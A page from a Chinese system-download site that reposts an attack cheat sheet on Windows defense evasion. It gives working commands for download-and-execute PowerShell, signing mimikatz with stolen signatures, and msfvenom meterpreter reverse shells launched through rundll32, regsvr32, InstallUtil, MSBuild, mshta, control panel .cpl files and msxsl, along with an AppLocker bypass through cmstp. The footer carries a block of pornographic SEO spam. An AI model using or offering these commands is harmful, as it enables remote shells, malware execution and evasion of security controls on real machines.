系統家園 - 系統下載更安全,全網最新系統專題大全。
最新更新 系統重裝教程(一看就會視頻+圖文版)
當前位置: 首頁 > 系統教程 > win11教程

Windows命令執行防御規避總結

更新日期:2023-09-22 10:16:06

來源:系統之家

手機掃碼繼續觀看
Windows命令執行防御規避總結

  今天小編為大家帶來Windows命令執行防御規避總結,具體如下:

Windows命令執行防御規避總結

  powershell

  powershell.exe -nop -w hidden -c \“IEX ((new-object net.webclient).downloadstring(‘https://xx.xx.xx.xx:8888/logo.gif’))\”“ /f

  SIP

  通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

  python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

  rundll32.exe

  生成

  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

  目標執行

  rundll32.exe shell32.dll,Control_RunDLL xxx.dll

  Regsvr32.exe

  msfconsole

  auxiliary/server/regsvr32_command_delivery_server

  set CMD net user test 123456 /add

  目標執行

  regsvr32 /s /n /u /i:https://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

  InstallUtil.exe

  1.編譯后門:

  C:\Windows\Microsoft.NET\Framework64\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk“ xxx.cs

  2.靶機上運行:

  InstallUtil.exe /U xxx.exe

  3.msf監聽,得到反彈的shell:

  set payload windows/x64/meterpreter/reverse_tcp

  set LHOST xx.xx.xx.xx

  set LPORT 4444

  exploit

  Msbuild.exe

  MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

  https://github.com/3gstudent/msbuild-inline-task

  msf生成shellcode

  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

  -f csharp

  使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

  msf監聽

  use exploit/multi/handler

  set payload windows/x64/meterpreter/reverse_tcp

  set lhost xx.xx.xx.xx

  set lport 4444

  exploit

  運行

  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml

  CMSTP

  cmstp.exe /s /ns C:\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt繞過AppLocker并啟動惡意腳本

  Mshta.exe

  Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

  use exploit/windows/misc/hta_server

  msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

  msf exploit(windows/misc/hta_server) 》 exploit

  mshta.exe https://xx.xx.xx.xx:8080/xxxxxxx.hta

  控制面板

  攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。

  攻擊者構造惡意的dll文件CPIApplet.dll

  利用msf生成dll文件

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

  傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:\users\administrator\desktop\CPIApplet.cpl 執行命令

  通過msxsl.exe調用惡意xml文件執行腳本

  制作兩個文件

  customers.xml

  script.xsl

  xmlns:xsl=”https://www.w3.org/1999/XSL/Transform“

  xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

  xmlns:user=”https://mycompany.com/mynamespace“》

  function xml(nodelist) {

  var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

  return nodelist.nextNode().xml;

  }

  開啟http服務

  python3 -m http.server 80

  遠程下載執行

  msxsl.exe https://xx.xx.xx.xx/customers.xml https://xx.xx.xx.xx/scrip.xsl

該文章是否有幫助到您?
Windows 10 系統在線下載
Windows 10 是迄今為止最好的 Windows|前往下載,成就你的非凡
立即下載 視頻教程:如何安裝該系統?
常見問題
系統下載排行

其他人正在下載 更多
安卓下載 更多
手機上觀看
掃碼手機上觀看
主站蜘蛛池模板: 人妻系列无码专区无码中出| 亚洲av片不卡无码久久| 日韩AV无码精品人妻系列| 亚洲中文久久精品无码| 无码国产精品一区二区免费16| 在线看无码的免费网站| 真人无码作爱免费视频| 久久久无码人妻精品无码| 亚洲美日韩Av中文字幕无码久久久妻妇| 少妇无码太爽了不卡在线观看| 亚洲av永久无码嘿嘿嘿| 亚洲av永久无码精品网站| 无码人妻精品一区二| 亚洲国产精品无码第一区二区三区| 国产成人无码精品久久久久免费| 久久久久久精品无码人妻| 国产真人无码作爱视频免费| 日韩中文无码有码免费视频| 无套中出丰满人妻无码| 国产精品三级在线观看无码| 久久青青草原亚洲av无码| 无码人妻aⅴ一区二区三区有奶水 亚洲AV无码专区在线厂 | 成人无码区免费视频观看| 中文字幕日韩精品无码内射| 国产精品无码久久av| 小12箩利洗澡无码视频网站| 国产精品99久久久精品无码| 一本大道无码日韩精品影视_| 亚洲熟妇无码AV不卡在线播放 | 亚洲欧洲精品无码AV| 亚洲区日韩区无码区| 国产激情无码一区二区三区| 国产爆乳无码视频在线观看3| 无码人妻一区二区三区兔费| 亚洲AV无码精品国产成人| 国产精品无码AV不卡| 精品久久久久久无码中文字幕漫画 | 国产精品无码无需播放器| 午夜麻豆国产精品无码| 亚洲AV无码成人精品区日韩 | 亚洲av无码成人精品区|